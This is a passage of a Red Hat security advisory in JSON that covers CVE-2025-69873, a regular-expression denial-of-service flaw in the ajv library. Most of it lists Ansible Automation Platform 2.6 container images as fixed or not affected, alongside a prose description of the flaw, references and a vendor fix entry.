"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439070"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in ajv. When the $data option is enabled, the value of the pattern keyword is passed directly to the JavaScript RegExp() constructor without sufficient validation. An attacker able to supply a malicious regular expression pattern can trigger a ReDoS (Regular Expression Denial of Service), causing the application to become unresponsive and resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "ajv: ReDoS via $data reference",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, the $data option must be enabled and the attacker needs to be able to send a payload with a specially crafted regular expression to the application processing the input. A 31-character payload causes approximately 44 seconds of execution, with each additional character doubling the execution time. Therefore, even a small payload can cause an application to become unresponsive and eventually result in a denial of service. Due to this reason, this flaw has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-69873"
},
{
"category": "external",
"summary": "RHBZ#2439070",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439070"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-69873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69873"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873"
},
{
"category": "external",
"summary": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md",
"url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md"
}
],
"release_date": "2026-02-11T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-01T18:20:27+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
